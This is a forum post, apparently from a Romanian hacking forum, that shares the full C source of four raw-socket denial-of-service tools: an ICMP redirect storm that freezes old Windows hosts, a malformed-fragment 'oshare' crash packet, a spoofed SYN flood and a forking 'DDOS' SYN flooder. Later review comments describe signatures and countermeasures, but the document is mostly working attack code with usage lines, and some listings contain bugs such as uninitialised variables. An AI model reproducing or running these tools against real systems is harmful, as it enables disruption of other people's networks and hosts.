Showing content with the highest reputation on 07/01/09 in all areas

  1. Foarte bun tutorialul, dar merge numai pe Linux. O sa postez mai multe surse de pe net care fac diferite lucruri folosind socket-uri (tot pentru Linux). EDIT: Toate programele sunt prezentate doar in scopuri educative si se gasesc si pe net.

WinFreez.c

/*
   WinFreez.c by Delmore <delmore@moscowmail.com>

   ICMP/Redirect-host message storm freeze Win9x/NT(sp4) box in LAN.

   Usage: winfreez sendtoip sendfromip time
   where <sendtoip> is victim host, <sendfromip> is router for victim host,
   <time> is time in seconds to freeze victim.

   Note:
   I've written small exploit for freeze win9x/nt boxes in LAN.
   Proggy initiates ICMP/Redirect-host messages storm from router
   (use router ip). Windows will receive redirect-host messages and change
   own route table, therefore it will be frozen or slowly working during
   this time.

   On victim machine route table changes viewing with:
   ROUTE PRINT
   command in ms-dos box.

   Exploit show different result for different system configuration.

   System results:
   p200/16ram/win95osr2 is slowly execute application after 20 seconds of storm.
   p233/96ram/nt4-sp4 is slowly working after 30 seconds of storm.
   p2-266/64ram/win95 working slowly and can't normal execute application.

   Compiled on RedHat Linux 5, Kernel 2.0.35 (x86)
   gcc ./winfreez.c -o winfreez

   --- for Slackware Linux, Kernel 2.0.30
   If you can't compile due to ip_sum not defined errors,
   replace (line 207):
   ip->ip_sum = 0;
   to line:
   ip->ip_csum = 0;
   ---

   Soldiers Of Satan group
   Russia, Moscow State University, 05 march 1999
   http://sos.nanko.ru

   Thanx to Mark Henderson.
*/

/*
 * NOTE(review): defensive reading of this listing.
 * What the code below puts on the wire: ICMP type 5 (redirect), code 1
 * (redirect host), with an IP source address supplied on the command line,
 * outer IP id 4321 / TTL 255 and an embedded IP header with id 3722 /
 * TTL 254, 100 bytes per datagram, sent in a tight loop.  The embedded
 * destination is a fresh random address on every iteration.
 * Those constants are usable as detection signatures, and a sustained
 * burst of redirect-host messages aimed at a single host is anomalous on
 * its own.  Hosts that do not depend on ICMP redirects can be configured
 * to ignore them, and source-address validation on the LAN stops a host
 * from sending as the router.
 */

#define ICMP_REDIRECT 5

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/errno.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
/* #include <netinet/ip_icmp.h> */

/*
 * Structure of an icmp header (from sparc header).
 *
 * Declared locally because the system <netinet/ip_icmp.h> include above is
 * commented out.  The #define lines inside the struct give short names for
 * the members of the two unions.
 */
struct icmp {
    u_char icmp_type; /* type of message, see below */
    u_char icmp_code; /* type sub code */
    u_short icmp_cksum; /* ones complement cksum of struct */
    union {
        u_char ih_pptr; /* ICMP_PARAMPROB */
        struct in_addr ih_gwaddr; /* ICMP_REDIRECT */
        struct ih_idseq {
            n_short icd_id;
            n_short icd_seq;
        } ih_idseq;
        int ih_void;
    } icmp_hun;
#define icmp_pptr icmp_hun.ih_pptr
#define icmp_gwaddr icmp_hun.ih_gwaddr
#define icmp_id icmp_hun.ih_idseq.icd_id
#define icmp_seq icmp_hun.ih_idseq.icd_seq
#define icmp_void icmp_hun.ih_void
    union {
        struct id_ts {
            n_time its_otime;
            n_time its_rtime;
            n_time its_ttime;
        } id_ts;
        struct id_ip {
            struct ip idi_ip;
            /* options and then 64 bits of data */
        } id_ip;
        u_long id_mask;
        char id_data[1];
    } icmp_dun;
#define icmp_otime icmp_dun.id_ts.its_otime
#define icmp_rtime icmp_dun.id_ts.its_rtime
#define icmp_ttime icmp_dun.id_ts.its_ttime
#define icmp_ip icmp_dun.id_ip.idi_ip
#define icmp_mask icmp_dun.id_mask
#define icmp_data icmp_dun.id_data
};

u_short in_cksum (u_short *addr, int len);
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s );

/*
 * Entry point: expects exactly three arguments (sendto, sendfrom, time),
 * copies the two address strings to the heap, opens a raw IPv4 socket,
 * prints a banner and hands everything to attack().
 *
 * Exits with status 1 on a wrong argument count, on socket() failure or on
 * setsockopt() failure.  Opening a SOCK_RAW socket typically requires
 * elevated privileges, so an unprivileged account cannot run this as is.
 */
int main (int argc, char **argv)
{
    time_t wtime;
    char *sendtoip, *sendfromip;
    int s, on;

    if (argc != 4) {
        fprintf (stderr, "usage: %s sendto sendfrom time\n", argv[0]);
        exit (1);
    }

    /* Private heap copies of the two address arguments; malloc() results are not checked. */
    sendtoip = (char *)malloc(strlen(argv[1]) + 1);
    strcpy(sendtoip, argv[1]);
    sendfromip = (char *)malloc(strlen(argv[2]) + 1);
    strcpy(sendfromip, argv[2]);
    /* Duration in seconds; atol() gives no indication of a malformed number. */
    wtime = atol(argv[3]);

    if ((s = socket (AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
        fprintf (stderr, "socket creation error\n" );
        exit (1);
    }

    /* Only compiled in when the platform headers define IP_HDRINCL. */
#ifdef IP_HDRINCL
    if (setsockopt (s, IPPROTO_IP, IP_HDRINCL, &on, sizeof (on)) < 0) {
        fprintf (stderr, "sockopt IP_HDRINCL error\n" );
        exit (1);
    }
#endif

    printf("winfreez by Delmore, <delmore@moscowmail.com>\n");
    printf("Soldiers Of Satan group, http://sos.nanko.ru\n\n");
    printf("sendto = %s\n", sendtoip);
    printf("sendfrom = %s\n", sendfromip);
    printf("time = %i s\n", wtime);

    attack( sendtoip, sendfromip, wtime, s );

    free( (void *) sendtoip );
    free( (void *) sendfromip );
}

/*
 * Builds and sends one 100-byte ICMP redirect-host datagram per loop
 * iteration on raw socket `s`.
 *
 *   sendtoip   - destination host (name or dotted quad); also written into
 *                the redirect's gateway-address field
 *   sendfromip - address written into the outer IP source field
 *   wtime      - duration in seconds; 0 returns immediately
 *   s          - raw socket opened by the caller
 *
 * Exits the process with status 1 if either address cannot be resolved or
 * if sendto() fails.  Returns nothing.
 */
void attack( char *sendtoip, char *sendfromip, time_t wtime, int s )
{
    time_t curtime, endtime;
    int i1, i2, i3, i4;
    char redir[21];
    char buf[100];
    /* The outer IP header sits at the start of buf, the ICMP header directly after it. */
    struct ip *ip = (struct ip *) buf;
    struct icmp *icmp = (struct icmp *) (ip + 1);
    struct hostent *hp;
    struct sockaddr_in dst;

    if(wtime==0) return;

    /* Up-front resolvability check for both arguments: resolver first, dotted quad as fallback. */
    if ((hp = gethostbyname (sendtoip)) == NULL)
        if ((ip->ip_dst.s_addr = inet_addr (sendtoip)) == -1) {
            fprintf (stderr, "%s: unknown sendto\n", sendtoip);
            exit (1);
        }

    if ((hp = gethostbyname (sendfromip)) == NULL)
        if ((ip->ip_src.s_addr = inet_addr (sendfromip)) == -1) {
            fprintf (stderr, "%s: unknown sendfrom\n", sendfromip);
            exit (1);
        }

    /* The end time doubles as the PRNG seed. */
    endtime = time(NULL) + wtime;
    srand((unsigned int) endtime);

    do {
        /* The packet is rebuilt from zero on every iteration. */
        bzero (buf, sizeof buf);

        /* sendto/gateway */
        hp = gethostbyname (sendtoip);
        bcopy (hp->h_addr_list[0], &ip->ip_dst.s_addr, hp->h_length);
        bcopy (hp->h_addr_list[0], &icmp->icmp_gwaddr.s_addr, hp->h_length);

        /* sendfrom */
        hp = gethostbyname (sendfromip);
        bcopy (hp->h_addr_list[0], &ip->ip_src.s_addr, hp->h_length);

        /* generate redirect*/
        /* One octet drawn from 1..223 and three from 1..253, formatted as a dotted quad. */
        i1 = 1+(int) (223.0*rand()/(RAND_MAX+1.0));
        i2 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
        i3 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));
        i4 = 1+(int) (253.0*rand()/(RAND_MAX+1.0));

        bzero (redir, sizeof redir);
        sprintf(redir,"%u.%u.%u.%u", i4, i3, i2, i1 );

        /* The random address becomes the destination of the embedded IP header. */
        hp = gethostbyname (redir);
        bcopy (hp->h_addr_list[0], &icmp->icmp_ip.ip_dst.s_addr, hp->h_length);

        /* Outer IPv4 header: protocol 1 (ICMP), fixed id 4321, TTL 255. */
        ip->ip_v = 4;
        ip->ip_hl = sizeof *ip >> 2;
        ip->ip_tos = 0;
        ip->ip_len = htons (sizeof buf);
        ip->ip_id = htons (4321);
        ip->ip_off = 0;
        ip->ip_ttl = 255;
        ip->ip_p = 1;
        ip->ip_sum = 0; /* kernel fills this in */

        /* Embedded header: source is the outer destination, fixed id 3722, TTL 254. */
        bcopy (&ip->ip_dst.s_addr, &icmp->icmp_ip.ip_src.s_addr, sizeof (ip->ip_dst.s_addr));
        icmp->icmp_ip.ip_v = 4;
        icmp->icmp_ip.ip_hl = sizeof *ip >> 2;
        icmp->icmp_ip.ip_tos = 0;
        icmp->icmp_ip.ip_len = htons (100); /* doesn't matter much */
        icmp->icmp_ip.ip_id = htons (3722);
        icmp->icmp_ip.ip_off = 0;
        icmp->icmp_ip.ip_ttl = 254;
        icmp->icmp_ip.ip_p = 1;
        icmp->icmp_ip.ip_sum = in_cksum ((u_short *) & icmp->icmp_ip, sizeof *ip);

        dst.sin_addr = ip->ip_dst;
        dst.sin_family = AF_INET;

        icmp->icmp_type = ICMP_REDIRECT;
        icmp->icmp_code = 1; /* 1 - redirect host, 0 - redirect net */
        /* The ICMP checksum covers everything in buf after the outer IP header. */
        icmp->icmp_cksum = in_cksum ((u_short *) icmp, sizeof (buf) - sizeof (*ip));

        if( sendto( s, buf, sizeof buf, 0, (struct sockaddr *) &dst, sizeof dst) < 0 ) {
            fprintf (stderr, "sendto error: %d\n",errno);
            exit (1);
        }

    /* The loop ends only when the clock reads exactly endtime. */
    }while (time(NULL)!=endtime);
}

/*
 * in_cksum -- Checksum routine for Internet Protocol family headers (C
 * Version) - code from 4.4 BSD
 *
 *   addr - start of the data, read as 16-bit words
 *   len  - number of bytes to cover
 *
 * Returns the complement of the folded 16-bit sum.
 */
u_short in_cksum (u_short *addr, int len)
{
    register int nleft = len;
    register u_short *w = addr;
    register int sum = 0;
    u_short answer = 0;

    /*
     * Our algorithm is simple, using a 32 bit accumulator (sum), we add
     * sequential 16 bit words to it, and at the end, fold back all the
     * carry bits from the top 16 bits into the lower 16 bits.
     */
    while (nleft > 1) {
        sum += *w++;
        nleft -= 2;
    }

    /* mop up an odd byte, if necessary */
    if (nleft == 1) {
        *(u_char *) (&answer) = *(u_char *) w;
        sum += answer;
    }

    /* add back carry outs from top 16 bits to low 16 bits */
    sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
    sum += (sum >> 16); /* add carry */
    answer = ~sum; /* truncate to 16 bits */
    return (answer);
}

Cu programul urmator win95-ul si Mac-ul mai vechi picau (la win95 aparea ecran albastru).

/****************************************************************************/
/* [ oshare_1_gou ver 0.1 ] -- Dressing up No.1 -- */
/* */
/* */
/* This program transmits the "oshare" packet which starts a machine aga- */
/* in or crash. But, because it can't pass through the router, it can be */
/* carried out only in the same segment. */
/* "oshare packet" is (frag 39193:-4@65528+), If ihl and tot_len are cha- */
/* nged, it has already tested that it becomes possible to kill Mac, too. */
/* ----------------------------------------- */
/* Written by R00t Zer0 */
/* E-Mail : defcon0@ugtop.com */
/* Web URL : http://www.ugtop.com/defcon0/index.htm */
/****************************************************************************/

/*
 * NOTE(review): defensive reading of this listing.
 * The datagram built below is a deliberately malformed IPv4 header: the
 * header-length nibble and the total-length field are random on every
 * send, the fragment field is the constant 16383 (0x3fff), and the id
 * (1999), TTL (0xff), protocol (UDP) and source ("1.1.1.1") are fixed.
 * A header length below 5 words, or a total length that disagrees with the
 * bytes actually received, is invalid on its face, so packet filters and
 * IP stacks that validate the header before reassembly reject it.  The
 * author's own header states that the packet does not pass a router, which
 * limits exposure to hosts on the same segment.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <netdb.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <ctype.h>
#include <arpa/inet.h>
#include <unistd.h>
#include <string.h>
#include <errno.h>

u_short in_cksum( u_short *, int );
int send_oshare_packet( int, u_long );

/*
 * Internet checksum: sums `len` bytes starting at `addr` as 16-bit words,
 * adds a trailing odd byte if there is one, folds the carries back into the
 * low 16 bits and returns the complement.
 */
u_short in_cksum( u_short *addr, int len )
{
    int nleft = len;
    u_short *w = addr;
    int sum = 0;
    u_short answer = 0;

    while( nleft > 1 ) {
        sum += *w++;
        nleft -= 2;
    }

    /* Odd trailing byte: placed in the first byte of a zeroed 16-bit word. */
    if (nleft == 1) {
        *( u_char *)( &answer ) = *( u_char *)w;
        sum += answer;
    }

    /* Fold the carries twice, then complement. */
    sum = ( sum >> 16 ) + ( sum & 0xffff );
    sum += ( sum >> 16 );
    answer = ~sum;
    return( answer );
}

/*
 * Allocates a zeroed 40-byte buffer, fills in an IPv4 header at its start
 * and sends the buffer to dst_addr on the raw socket sock_send.
 *
 *   sock_send - raw socket opened by the caller
 *   dst_addr  - destination address, used as given
 *
 * Returns whatever sendto() returned.  The malloc() result is not checked.
 */
int send_oshare_packet( int sock_send, u_long dst_addr )
{
    char *packet;
    int send_status;
    struct ip *ip;
    struct sockaddr_in to;
    long lll;

    packet = ( char *)malloc( 40 );
    ip = ( struct ip *)( packet );
    memset( packet, 0, 40 );

    ip->ip_v = 4;
    // ip->ip_hl = 11;
    ip->ip_tos = 0x00;
    // ip->ip_len = htons( 44 );
    ip->ip_id = htons( 1999 );
    ip->ip_off = htons( 16383 );
    ip->ip_ttl = 0xff;
    ip->ip_p = IPPROTO_UDP;
    /* The two fixed values commented out above are replaced by random ones. */
    ip->ip_hl = rand() % 16;
    ip->ip_len = rand() % 0xffff;

    lll=(long)htonl( inet_addr( "1.1.1.1" ));
    memcpy(&ip->ip_src,&lll,sizeof(long));
    memcpy(&ip->ip_dst,&dst_addr,sizeof(long));
    /* NOTE(review): the checksum length is 44 while the allocation above is 40 bytes. */
    ip->ip_sum = in_cksum( ( u_short *)ip, 44 );

    to.sin_family = AF_INET;
    to.sin_port = htons( 0x123 );
    to.sin_addr.s_addr = dst_addr;

    send_status = sendto( sock_send, packet, 40, 0, ( struct sockaddr *)&to, sizeof( struct sockaddr ) );

    free( packet );
    return( send_status );
}

/*
 * Entry point: expects <dst addr> and <num(k)>, resolves the destination
 * (dotted quad first, resolver as fallback), opens a raw socket and calls
 * send_oshare_packet() 1000 times for each unit of the count argument,
 * printing one dot per thousand.
 *
 * Exits with -1 on a wrong argument count, an unknown host or socket()
 * failure, and with 0 when the loop completes.
 */
int main( int argc, char *argv[] )
{
    char tmp_buffer[ 1024 ];
    int loop, loop2;
    int sock_send;
    u_long src_addr, dst_addr;
    u_short src_port, dst_port;
    struct hostent *host;
    struct sockaddr_in addr;
    time_t t;

    if( argc != 3 ) {
        printf( "Usage : %s <dst addr> <num(k)>\n", argv[0] );
        exit( -1 );
    }

    /* Seeds rand(), which send_oshare_packet() uses for the header fields. */
    t = time( 0 );
    srand( ( u_int )t );

    memset( &addr, 0, sizeof( struct sockaddr_in ) );
    addr.sin_family = AF_INET;
    addr.sin_addr.s_addr = inet_addr( argv[1] );
    if( addr.sin_addr.s_addr == -1 ) {
        host = gethostbyname( argv[1] );
        if( host == NULL ) {
            printf( "Unknown host %s.\n", argv[1] );
            exit( -1 );
        }
        addr.sin_family = host->h_addrtype;
        memcpy( ( caddr_t )&addr.sin_addr, host->h_addr, host->h_length );
    }
    memcpy( &dst_addr, ( char *)&addr.sin_addr.s_addr, 4 );

    if( ( sock_send = socket( AF_INET, SOCK_RAW, IPPROTO_RAW ) ) == -1) {
        perror( "Getting raw send socket" );
        exit( -1 );
    }

    printf( "\n\"Oshare Packet\" sending" );
    fflush( stdout );

    /* The return value of send_oshare_packet() is ignored here. */
    for( loop = 0; loop < atoi( argv[2] ); loop++ ) {
        for( loop2 = 0; loop2 < 1000; loop2++ )
            send_oshare_packet( sock_send, dst_addr );
        fprintf( stderr, "." );
        fflush( stdout );
    }

    printf( "\n\nDone.\n\n" );
    fflush( stdout );

    close( sock_send );
    exit( 0 );
}

Syn Flood:

/*
 * NOTE(review): defensive reading of this listing.
 * The segments built below are TCP SYNs to port 137 with a source address
 * drawn from 192.168.0.1-253, source port 2000-2999, window 8000, a single
 * MSS option of 1460, TTL 255 and an IP id that increments from 0x789; the
 * sender pauses one second after every 1000 packets.  The destination
 * defaults to 127.0.0.1 unless an argument is given.
 * A listener sees this as a rising count of half-open connections from
 * sources that never complete the handshake.  SYN cookies and backlog
 * limits on the listener, and source-address validation at the network
 * edge (RFC 2827 / BCP 38), are the standard countermeasures.
 */

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <arpa/inet.h>

#define DST_PORT 137

static char *dst_addr = "127.0.0.1";

/* Pseudo-header layout used for the TCP checksum; declared packed. */
struct pseudo_header {
    unsigned long src_addr;
    unsigned long dst_addr;
    unsigned char zero;
    unsigned char proto;
    unsigned short length;
}__attribute__ ((packed));

int create_raw_socket(void);
int send_frag_ip_pkt(int);
u_short in_cksum(u_short *, int);

/* IP identification value, post-incremented for every packet sent. */
static u_short ip_id = 0x789;

/*
 * Entry point: opens the raw socket, optionally takes the destination from
 * argv[1], then sends packets in an endless loop, sleeping one second
 * after every 1000.  Returns -1 if a send fails; the statements after the
 * loop are not reached.
 */
int main(int argc, char *argv[])
{
    int sock = create_raw_socket();
    int n = 0;

    if(argc>=2) {
        dst_addr = argv[1];
    }

    srand(time(NULL));

    while(1) {
        printf("%d: Sending IP packet ... ", n++);
        fflush(stdout);
        if(send_frag_ip_pkt(sock)<0) {
            perror("sendto");
            return -1;
        }
        printf("done\n");
        if( (n%1000)==0 ) sleep(1);
    }

    close(sock);
    return 0;
}

/*
 * Opens a raw IPv4 socket and enables IP_HDRINCL on it.
 * Exits with status 1 if socket() or setsockopt() fails; otherwise returns
 * the descriptor.
 */
int create_raw_socket(void)
{
    int sock;
    int on = 1;

    sock = socket(AF_INET, SOCK_RAW,IPPROTO_ICMP);
    if(sock<0) {
        perror("socket");
        exit(1);
    }

    if(setsockopt(sock, IPPROTO_IP, IP_HDRINCL, &on, sizeof(on))<0) {
        perror("setsockopt");
        exit(1);
    }

    return sock;
}

/*
 * Builds one 44-byte packet (20-byte IP header, 20-byte TCP header, 4-byte
 * MSS option) in a local buffer and sends it on socket sd to the address in
 * the file-scope dst_addr.
 *
 *   sd - raw socket from create_raw_socket()
 *
 * Returns the result of sendto().  Despite the function name, frag_off is
 * set to 0.
 */
int send_frag_ip_pkt(int sd)
{
    struct sockaddr_in sin;
    unsigned char buf[20 + 20 +4];
    unsigned char chkbuf[512];
    char local_addr[32];
    struct iphdr *iph;
    struct tcphdr*tcph;
    struct pseudo_header *ph;
    u_short *port;
    int i;

    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = inet_addr(dst_addr);
    sin.sin_port = 0;

    /* Source address for this packet: last octet drawn from 1..253. */
    sprintf(local_addr, "192.168.0.%u", 1 + ((unsigned)rand())%253 );

    memset(buf, 0, sizeof(buf));

    /* IPv4 header at the start of buf; checksum computed over its 20 bytes. */
    iph = (struct iphdr *)buf;
    iph->ihl = 5;
    iph->version = 4;
    iph->tos = 0;
    iph->tot_len = sizeof(buf);
    iph->id = ip_id++;
    iph->frag_off = 0;
    iph->ttl = 255;
    iph->protocol = IPPROTO_TCP;
    iph->check = 0;
    iph->saddr = inet_addr(local_addr);
    iph->daddr = inet_addr(dst_addr);
    iph->check = in_cksum((u_short *)buf, 20);

    /* TCP header at offset 20: SYN flag only, data offset 6 words (24 bytes). */
    tcph = (struct tcphdr *)&buf[20];
    tcph->source= htons((u_short)(2000 + rand() % 1000));
    tcph->dest = htons(DST_PORT);
    tcph->seq = (unsigned short)rand();
    tcph->ack_seq = 0;
    tcph->doff = 6; /* data offset */
    tcph->syn = 1;
    tcph->window= htons(8000);
    tcph->check = 0;
    tcph->urg_ptr = 0;

    /* Single TCP option at offset 40: maximum segment size, length 4, value 1460. */
    buf[40] = TCPOPT_MAXSEG;
    buf[41] = 4;
    *(unsigned short *)(buf + 42) = htons(1460);

    /* Pseudo-header fields are written through ph, the TCP bytes are copied into chkbuf. */
    ph->src_addr = iph->saddr;
    ph->dst_addr = iph->daddr;
    ph->zero = 0;
    ph->proto = iph->protocol;
    ph->length = htons(sizeof(buf) - sizeof(*iph));

    memcpy(chkbuf + sizeof(*ph), &buf[sizeof(*iph)], sizeof(buf) - sizeof(*iph));
    tcph->check = in_cksum((u_short *)chkbuf, sizeof(buf) - sizeof(*iph) + sizeof(*ph));

    return sendto(sd, buf, sizeof(buf), 0, (struct sockaddr *)&sin, sizeof(sin));
}

/*
 * Internet checksum over `len` bytes at `addr`: 16-bit words are summed
 * into an int, a trailing odd byte is added, the carries are folded back
 * and the complement is returned.
 */
u_short in_cksum(u_short *addr, int len)
{
    int nleft = len;
    int sum = 0;
    u_short *w = addr;
    u_short answer = 0;

    while(nleft > 1) {
        sum += *w;
        w++;
        nleft -= 2;
    }

    /* Odd trailing byte: placed in the first byte of a zeroed 16-bit word. */
    if(nleft == 1) {
        *(unsigned char *)(&answer) = *(unsigned char *)w;
        sum += answer;
    }

    /* Fold the carries twice, then complement. */
    sum = (sum>>16) + (sum & 0xffff);
    sum += (sum>>16);
    answer = ~sum;
    return answer;
}

DDOS:

/*
 * NOTE(review): defensive reading of this listing.
 * Despite the title this is a single-host SYN sender: TCP SYNs to port 80
 * with a fixed source port of 8888, IP id 0, TTL MAXTTL and a source
 * address replaced by random() before every send.  Two fork() calls before
 * the loop leave four processes sending.
 * The constant source port and IP id across many unrelated source
 * addresses are a usable signature.  The countermeasures are the usual
 * ones for SYN floods: SYN cookies and backlog limits on the listener, and
 * source-address validation (RFC 2827 / BCP 38) so that random sources are
 * dropped at the sender's network edge.
 */

#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <stdlib.h>
#include <errno.h>
#include <unistd.h>
#include <stdio.h>
#include <netdb.h>

#define DESTPORT 80
#define LOCALPORT 8888

void send_tcp(int sockfd,struct sockaddr_in *addr);
unsigned short check_sum(unsigned short *addr,int len);

/*
 * Entry point: expects one argument (address or host name), resolves it,
 * opens a raw TCP socket with IP_HDRINCL and calls send_tcp(), which does
 * not return.
 *
 * Exits with status 1 on a wrong argument count, a resolver failure or
 * socket() failure.  The setsockopt() and setuid() results are not checked.
 */
int main(int argc,char **argv)
{
    int sockfd;
    struct sockaddr_in addr;
    struct hostent *host;
    int on=1;

    if(argc!=2) {
        fprintf(stderr,"Usage:%s hostname\n\a",argv[0]);
        exit(1);
    }

    bzero(&addr,sizeof(struct sockaddr_in));
    addr.sin_family=AF_INET;
    addr.sin_port=htons(DESTPORT);

    /* Dotted quad first; fall back to the resolver when inet_aton() rejects the text. */
    if(inet_aton(argv[1],&addr.sin_addr)==0) {
        host=gethostbyname(argv[1]);
        if(host==NULL) {
            fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));
            exit(1);
        }
        addr.sin_addr=*(struct in_addr *)(host->h_addr_list[0]);
    }

    sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);
    if(sockfd<0) {
        fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));
        exit(1);
    }

    setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));
    /* Sets the uid to the numeric value of the process id. */
    setuid(getpid());

    send_tcp(sockfd,&addr);
}

/*
 * Builds one IP + TCP header pair in a local buffer, forks twice, then
 * loops forever rewriting the source address and sending the buffer.
 *
 *   sockfd - raw socket opened by main()
 *   addr   - destination address and port
 *
 * Never returns.  The sendto() and fork() results are ignored.
 */
void send_tcp(int sockfd,struct sockaddr_in *addr)
{
    char buffer[100];
    struct ip *ip;
    struct tcphdr *tcp;
    int head_len;

    /* Only the two headers are sent; there is no payload. */
    head_len=sizeof(struct ip)+sizeof(struct tcphdr);
    bzero(buffer,100);

    ip=(struct ip *)buffer;
    ip->ip_v=IPVERSION;
    ip->ip_hl=sizeof(struct ip)>>2;
    ip->ip_tos=0;
    ip->ip_len=htons(head_len);
    ip->ip_id=0;
    ip->ip_off=0;
    ip->ip_ttl=MAXTTL;
    ip->ip_p=IPPROTO_TCP;
    ip->ip_sum=0;
    ip->ip_dst=addr->sin_addr;

    /* TCP header directly after the IP header: SYN flag only, no options. */
    tcp=(struct tcphdr *)(buffer +sizeof(struct ip));
    tcp->source=htons(LOCALPORT);
    tcp->dest=addr->sin_port;
    tcp->seq=random();
    tcp->ack_seq=0;
    tcp->doff=5;
    tcp->syn=1;
    tcp->check=0;

    /* Two forks: four processes run the loop below. */
    fork();
    fork();

    while(1) {
        ip->ip_src.s_addr=random();
        printf("*");
        /* check_sum() is called on the TCP header bytes only. */
        tcp->check=check_sum((unsigned short *)tcp, sizeof(struct tcphdr));
        sendto(sockfd,buffer,head_len,0,addr,sizeof(struct sockaddr_in));
    }
}

/*
 * Checksum helper with the same structure as the in_cksum routines in the
 * listings above: sum 16-bit words over `len` bytes, add a trailing odd
 * byte, fold the carries and return the complement.  This copy reads the
 * words through a signed short pointer and keeps the result in a signed
 * short.
 */
unsigned short check_sum(unsigned short *addr,int len)
{
    register int nleft=len;
    register int sum=0;
    register short *w=addr;
    short answer=0;

    while(nleft>1) {
        sum+=*w++;
        nleft-=2;
    }

    /* Odd trailing byte: placed in the first byte of a zeroed 16-bit word. */
    if(nleft==1) {
        *(unsigned char *)(&answer)=*(unsigned char *)w;
        sum+=answer;
    }

    /* Fold the carries twice, then complement. */
    sum=(sum>>16)+(sum&0xffff);
    sum+=(sum>>16);
    answer=~sum;
    return(answer);
}